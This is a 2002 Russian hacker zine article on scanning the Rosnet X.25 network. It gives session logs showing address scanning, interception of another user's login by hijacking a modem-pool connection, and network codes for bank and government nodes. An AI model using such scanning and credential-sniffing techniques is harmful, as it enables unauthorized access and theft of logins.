
   ,g@S$$$$$S@g,  srb ;22222iiiiii;;;;
  J$$┘^````^┘$$$i $S@ i$$$$$$$$$$$$$$$   x25 zine. issue II. april 16/04/2002
 :$$[        i$$2 $$$ 2$$$$$$$$$$$$$$$ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
 `^^"       ,$$$' $$$ $$$$$$$$$$$$$$$$
         ,g$$$┘`, $$$ SSSSSSSSSSSS$╡$$
      ,g$$$┘`,g$$ $$$qqqqqqqqqqqq╖, ╘$      Rosnet                     Graf'
   ,g$$$┘`,g$$$$$ $$$$$$$$$$$$$$$$$$,`      --------------------------------
  J$$┘`,g$$$$$$$$                `$$$
 i$2; $$$$$$$$$$$ %%%%%%%%%%%%%%%$$$7
 ```` """"""""""" $$$$$$$$$$$$$$$7╛'
 2@%/
 $$$2  Роснет - одна из старых х.25 сетей бывшего союза. Здесь я раскажу о всем
 $$$2  извесном методе сканирования сети Роснет.Стандартное приглашение Роснета
 $$$2  выглядит так:
 $$$2
 $$$i  CONNECT 14400/ARQ/V34/LAPM/V42BIS
 $$$i  ACP   date: 2000-02-10   time: 16:19:30
 $$$i
 $$$;  Enter ADDRESS[*userdata], n-ADDRESS for NUI access or HELP
 $$$;
 $$$.  WELCOME TO ROSNET!
 $$$.
 $$$   *
 ```
 ,,,
 $$$   Далее вводишь NUA и бороздишь его просторы . Сканировать Роснет довольно
 $$$   просто , все сводится к тому , что надо сначала отсканить верхние адреса
 $$$   из них отобрать нужные и отсканировать нижние. Все это выглядит примерно
 $$$   так:
 ```
 ,,,
 $$$   *60001
 $$$
 $$$   ACP:clr dte originated - remote directive
 $$$            252 cannot find route to destination
 $$$
 $$$   *60002
 $$$
 $$$   ACP:clr not obtainable - remote directive
 $$$             67 invalid called address
 $$$
 $$$   *60003
 $$$
 $$$   ACP:clr not obtainable - remote directive
 $$$             67 invalid called address
 $$$
 $$$   *
 ```
 ,,,
 $$$   67 код сообщает о недействительном адресе , нет никакого смысла сканиро-
 $$$   вать нижние адреса по этому NUA (600020001, 600020002 и т.д.) эти адреса
 $$$   всегда будут возвращать код 67 . После того , как мы отсканируем верхние
 $$$   адреса и отберем нужные нам, приступаем к следующему сканированию нижних
 $$$   адресов:
 $$$
 $$$   *600010100
 $$$
 $$$   ACP:clr access barred - remote directive
 $$$           247 invalid or unavailable class of service
 $$$
 $$$   *600010101
 $$$
 $$$   ACP:clr dte originated - remote directive
 $$$            71 no logical channel available
 $$$
 $$$   *600010102
 $$$
 $$$   ACP:clr dte originated - remote directive
 $$$            67 invalid called address
 $$$
 $$$   *600010103
 $$$
 $$$   ACP:clr dte originated - remote directive
 $$$            71 no logical channel available
 $$$
 $$$   *
 ```
 ,,,
 $$$   Вот таким простым способом сканируется почти весь Роснет.Упустить что-то
 $$$   практически невозможно, единственное могу утверждать,что сканлисты могут
 $$$   быть не идентичны.Умные админы прикрывают роутинг на Падах и если я ска-
 $$$   нирую из Москвы и мне отвечают какие-то адреса,то нет ни какой гарантии,
 $$$   что сканируя из Питера эти адреса тоже ответят.
 ```

 ,,,
 $$$
 $$$   На закуску вам оставил самое интересное.Слыхали что-нибудь о sniffing'е?
 $$$   Когда то это было моим любимым занятием,здесь я изложу малое , что узнал
 $$$   сам.Не секрет,что модемные пулы имеют свой адрес (NUA),а если есть адрес
 $$$   то можно к нему подключится.Так как найти такие адреса? Довольно просто,
 $$$   вот пример:
 $$$
 $$$   При сканировании Роснета натыкаемся на такой адрес...
 $$$
 $$$   *600010100
 $$$
 $$$   ACP:clr access barred - remote directive
 $$$            247 invalid or unavailable class of service
 $$$
 $$$   Ага доступ закрыт....
 $$$   Далее...
 $$$
 $$$   *60001010001
 $$$
 $$$   ACP:clr not obtainable - remote directive
 $$$           233 invalid portname
 $$$
 $$$   ---//----
 $$$
 $$$
 $$$   *60001010009
 $$$
 $$$   ACP:clr number busy - remote directive
 $$$           231 iti not in idle state
 $$$
 $$$   *60001010010
 $$$
 $$$   ACP:clr access barred - remote directive
 $$$           247 invalid or unavailable class of service
 ```
 ,,,
 $$$   Заветный 231 код ,номер занят ,если постоянно слать запрос на соединение
 $$$   с этим NUA можно заметить как меняется код. Если он сменился на 247 , то
 $$$   даже после того, как номер стал свободен мы никогда к нему не подключим-
 $$$   ся,а если сменился на 241, то это то что нам нужно.Зацикливаем свой ска-
 $$$   нер на этот адрес и остается только ждать , пока кто-нибудь попытается к
 $$$   нему подключится:
 $$$
 $$$   *60001010009
 $$$
 $$$   ACP:clr not obtainable - remote directive
 $$$           241 device not ready
 $$$
 $$$   *60001010009
 $$$
 $$$   ACP:clr not obtainable - remote directive
 $$$           241 device not ready
 $$$
 $$$   *60001010009
 $$$
 $$$   ACP:clr not obtainable - remote directive
 $$$           241 device not ready
 $$$
 $$$   *60001010009
 $$$   ACP:fac: r,p(128,128),w(2,2),d(9600,9600)
 $$$   com
 $$$
 $$$   Enter ADDRESS[*userdata], n-ADDRESS for NUI access or HELP
 $$$
 $$$
 $$$   WELCOME TO ROSNET!
 $$$
 $$$   // вот мы подключились к модемному пулу, здесь нехватает только "*" //
 $$$
 $$$   *   <-- посылаем
 $$$
 $$$   6140604   <--  а это пришло с другого конца
 $$$
 $$$   Username:   <-- посылаем
 $$$
 $$$   guest2000   <--  )))))
 $$$
 $$$   -EOF-
 ```
 ,,,
 $$$   Тут все довольно ясно, комментировать не надо. Помимо  перехвата логинов
 $$$   и паролей можно столкнутся еще с одной интересной особенностью:
 $$$
 $$$   *60001010009
 $$$   ACP:clr number busy - remote directive
 $$$           231 iti not in idle state
 $$$
 $$$
 $$$   *60001010009
 $$$   ACP:fac: r,p(128,128),w(2,2),d(9600,9600)
 $$$   com
 $$$
 $$$   AT  <-- посылаем
 $$$
 $$$   OK
 $$$
 $$$   ATI3  <--- посылаем
 $$$
 $$$   ZyXEL V.90 1.06
 $$$
 $$$   -EOF-
 $$$
 $$$   Ну а что делать дальше рассказывать не буду.
 ```
      =======================================================================
 ,,,
 $$$   Сканирование сети не является преступлением,но имеет место предпосылки к
 $$$   угрозе безопасности на его просторах. За сетью Роснет с давних пор прис-
 $$$   тально наблюдают наши спецслужбы (ФСБ),по причине заседания в нем ЦБ РФ,
 $$$   угроза  безопасности ЦБ  попадает в их  юрисдикцию со всеми вытекающими.
 $$$   Имел место случай , когда за факт  сканирования приходилось отписываться
 $$$   кучей объяснительных, вот вам верхушка НУА некоторых адресов:
 $$$
 $$$
 $$$   - длинный  дрес: 02506ddrrnnppss
 $$$   - короткий  дрес:    6ddrrnnppss
 $$$
 $$$    где dd - код сети:
 $$$        00 - РОСHЕТ
 $$$        11 - МОТЕКО
 $$$        12 - ГУ ЦБ РФ
 $$$        13 - PTT Teleport
 $$$        15 - ЦАВС
 $$$        16 - ГСС
 $$$        17 - Сбербанк
 $$$        18 - Visa Tour
 $$$        19 - Таможня
 $$$        20 - Центризбирком
 ```
 ,,,
 $$$   Все остальные значения означают старую систему адресации, которая посте-
 $$$   пенно меняется на новую.
 $$$
 $$$   rr - для dd={00;12;18;19} - код регион  в соответствии с "Общероссийским
 $$$        классификатором экономических районов"
 $$$   nn - порядковый номер узла в регионе
 $$$   pp - номер порта X.25 н  узле. 00 означает один из программных модулей
 $$$        узла или  синхронный порт
 $$$   ss - номер  синхронного X.28 порта на узле или подадрес ПАДа или хоста
 $$$
 $$$!ig╖,_
 `|¤??$╡$$$A.
  .╖. `¤$$$L
,$$$$$$$, `$$$i
$$$$$$$$$  i$$$
?$$$$$$$7  $$$$qqqqqqqqqqqqq q   q
 `¤+?+¤` .╡$$$$$$$$$$22222222222 2  2   2   ;   ;    ;       ;
        ````````````````` `  `